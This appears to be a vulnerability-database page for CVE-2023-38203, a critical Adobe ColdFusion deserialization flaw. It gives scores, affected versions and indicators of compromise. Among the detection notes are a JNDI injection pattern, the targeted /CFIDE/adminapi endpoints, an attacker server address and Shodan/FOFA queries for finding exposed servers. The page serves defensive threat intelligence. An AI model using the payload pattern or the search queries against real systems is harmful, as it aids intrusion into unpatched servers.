cbcvebase.
CVE-2023-38203
published 2023-07-20

CVE-2023-38203: Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data…

PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2024-01-29
Exploited in the wild
EPSS
97.00%
99.9th percentile
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.

Affected

4 ranges
VendorProductVersion rangeFixed in
adobecoldfusion<= cf2023U2
adobecoldfusion
adobecoldfusion
adobecoldfusion

Detection & IOCsextracted from sources · hover to see the quote

url/CFIDE/adminapi/base.cfc?method=
hash7c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df
hash590d3088ed566cb3d85d48f4914cc657ee49b7d33e85c72167e7c72d81d4cb6c
hash808f0f85aee6be3d3f3dd4bb827f556401c4d69a642ba4b1cb3645368954622e
hash4f22fea4d0fadd2e01139021f98f04d3cae678e6526feb61fa8a6eceda13296a
filenamesvhost.exe
filenamescvhost.exe
filenameobfs.ps1
filenamerecon.ps1
pathC:\Windows\Debug\a.conf
commandargumentCollection={{jndi}}
snort
Adobe.ColdFusion.CVE-2023-38203.Insecure.Deserialization
  • Payloads are frequently Base64-encoded; decode HTTP POST bodies to /CFIDE/ endpoints for JNDI/LDAP strings indicating exploitation attempts.
  • Attackers use interactsh-based domains for probing/validation of the exploit; monitor DNS callbacks to interactsh infrastructure as an indicator of active exploitation.
  • Post-exploitation: look for Rclone binaries masquerading as svhost.exe or scvhost.exe performing data exfiltration to MegaSync cloud storage.
  • Shodan/FOFA queries can identify exposed ColdFusion instances: http.component:"Adobe ColdFusion", http.title:"coldfusion administrator login", app="Adobe-ColdFusion".
  • ·The Nuclei template targets /CFIDE/adminapi/base.cfc while Fortinet observed attacks against /CFIDE/adminapi/accessmanager.cfc — both endpoints should be monitored as attack vectors for CVE-2023-38203.
  • ·Storm-0501 exploitation of ColdFusion is attributed to 'possibly CVE-2023-29300 or CVE-2023-38203' — the specific CVE used in each intrusion was not definitively confirmed.
  • ·Attacker files on the HFS public server (103.255.177.55:6895) were frequently updated during the campaign, meaning hashes may not represent the full set of malware variants deployed.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.